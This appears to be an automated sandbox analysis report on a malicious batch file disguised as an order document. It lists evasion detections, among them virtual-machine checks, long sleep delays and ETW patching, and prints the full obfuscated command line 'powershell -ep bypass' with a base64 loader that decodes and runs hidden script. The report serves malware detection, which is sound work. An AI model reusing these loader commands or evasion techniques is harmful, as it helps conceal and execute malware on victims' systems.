Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5027			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4635			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8696	Thread sleep count: 5027 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8692	Thread sleep count: 4635 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8740	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: powershell.exe, 00000004.00000002.3794299800.0000000008057000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxlbWJseXNpZWtsXTo6KCdzaWVrbGRhb0wnc2lla2xbLTEuLnNpZWtsLTRdIC1zaWVrbGpvaW4gc2lla2wnJykoW3NpZWtsYnl0ZVtzaWVrbF1dJHBhc2lla2xyYW1fdnNpZWtsYXIpOwlzaWVrbCRhc2F3c2lla2xmPSRibXNpZWtscWl4LkVzaWVrbG50cnlQc2lla2xvaW50O3NpZWtsCSRhc2FzaWVrbH

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell decode and execute

Source: Yara match

File source: amsi32_8644.amsi.csv, type: OTHER

.NET source code references suspicious native API functions

Source: 4.2.powershell.exe.5f93858.2.raw.unpack, ibpaxdfrhq.cs	Reference to suspicious API methods: LoadLibrary("ntdll.dll")
Source: 4.2.powershell.exe.5f93858.2.raw.unpack, ibpaxdfrhq.cs	Reference to suspicious API methods: GetProcAddress(hModule, "EtwEventWrite")
Source: 4.2.powershell.exe.5f93858.2.raw.unpack, ibpaxdfrhq.cs	Reference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)array.Length, PAGE_EXECUTE_READWRITE, out var lpflOldProtect)

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQm

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\order no_3_17_2025 ref_HR 6473876476374647464657464564764746.bat"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQm			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dqoncirzy3jpchrdb250zw50id0gqccncir1c2vyc2lla2xoyw1lihnpzwtspsakzw5zawvrbhy6vvnfc2lla2xstkfnrxnpzwtsoyrxy2dzawvrbgttid0gc2lla2wiqzpcvxnpzwtsc2vyc1xzawvrbcr1c2vyc2lla2xoyw1lxhnpzwtszhdtlmjzawvrbgf0ijtpc2lla2xmichuzxnpzwtsc3qtugfzawvrbhroicrxc2lla2xjz2ttkxnpzwtsihsgicbzawvrbcbxcml0c2lla2xlluhvc3npzwtsdcaiqmfzawvrbhrjacbmc2lla2xpbgugznnpzwtsb3vuzdpzawvrbcakcwnnc2lla2xrbsiglxnpzwtsrm9yzwdzawvrbhjvdw5kc2lla2xdb2xvcnnpzwtsien5yw5zawvrbdsgicagc2lla2wkzmlszxnpzwtstgluzxnzawvrbca9ifttc2lla2x5c3rlbxnpzwtslklplkzzawvrbglszv06c2lla2w6umvhzhnpzwtsqwxstglzawvrbg5lcygkc2lla2xxy2drbxnpzwtslcbbu3lzawvrbhn0zw0uc2lla2xuzxh0lnnpzwtsrw5jb2rzawvrbgluz106c2lla2w6vvrgohnpzwtsktsgicbzawvrbcbmb3jlc2lla2xhy2ggkhnpzwtsjgxpbmvzawvrbcbpbiakc2lla2xmawxlthnpzwtsaw5lcylzawvrbcb7icagc2lla2wgicagihnpzwtsawygkcrzawvrbgxpbmugc2lla2wtbwf0y3npzwtsacanxjpzawvrbdo6id8oc2lla2wukykkj3npzwtsksb7icbzawvrbcagicagc2lla2wgicagihnpzwtsv3jpdgvzawvrbc1ib3n0c2lla2wgikluannpzwtszwn0aw9zawvrbg4gy29kc2lla2xligrldhnpzwtszwn0zwrzawvrbcbpbib0c2lla2xozsbiyxnpzwtsdgnoigzzawvrbglszs4ic2lla2wgluzvcnnpzwtszwdyb3vzawvrbg5kq29sc2lla2xvcibdexnpzwtsyw47icbzawvrbcagicagc2lla2wgicagihnpzwtsdhj5ihtzawvrbcagicagc2lla2wgicagihnpzwtsicagicbzawvrbcakzgvjc2lla2xvzgvkqnnpzwtsexrlcybzawvrbd0gw1n5c2lla2xzdgvtlnnpzwtsq29udmvzawvrbhj0xto6c2lla2xgcm9tqnnpzwtsyxnlnjrzawvrbfn0cmluc2lla2xnkcrtyxnpzwtsdgnozxnzawvrbfsxxs5uc2lla2xyaw0okxnpzwtsktsgicbzawvrbcagicagc2lla2wgicagihnpzwtsicagjglzawvrbg5qzwn0c2lla2xpb25db3npzwtszgugpsbzawvrbfttexn0c2lla2xlbs5uzxnpzwtsehqurw5zawvrbgnvzgluc2lla2xnxto6vxnpzwtsbmljb2rzawvrbguur2v0c2lla2xtdhjpbnnpzwtszygkzgvzawvrbgnvzgvkc2lla2xcexrlc3npzwtsktsgicbzawvrbcagicagc2lla2wgicagihnpzwtsicagv3jzawvrbgl0zs1ic2lla2xvc3qginnpzwtssw5qzwnzawvrbhrpb24gc2lla2xjb2rlihnpzwtszgvjb2rzawvrbgvkihn1c2lla2xjy2vzc3npzwtsznvsbhlzawvrbc4iic1gc2lla2xvcmvncnnpzwtsb3vuzenzawvrbg9sb3igc2lla2xhcmvlbnnpzwtsoyagicbzawvrbcagicagc2lla2wgicagihnpzwtsicbxcmlzawvrbhrlluhvc2lla2xzdcairxnpzwtsegvjdxrzawvrbgluzybpc2lla2xuamvjdhnpzwtsaw9uignzawvrbg9kzs4uc2lla2wuiiatrnnpzwtsb3jlz3jzawvrbg91bmrdc2lla2xvbg9yihnpzwtswwvsbg9zawvrbhc7icagc2lla2wgicagihnpzwtsicagicbzawvrbcagieluc2lla2x2b2tllxnpzwtsrxhwcmvzawvrbhnzaw9uc2lla2wgjgluannpzwtszwn0aw9zawvrbg5db2rlc2lla2w7icagihnpzwtsicagicbzawv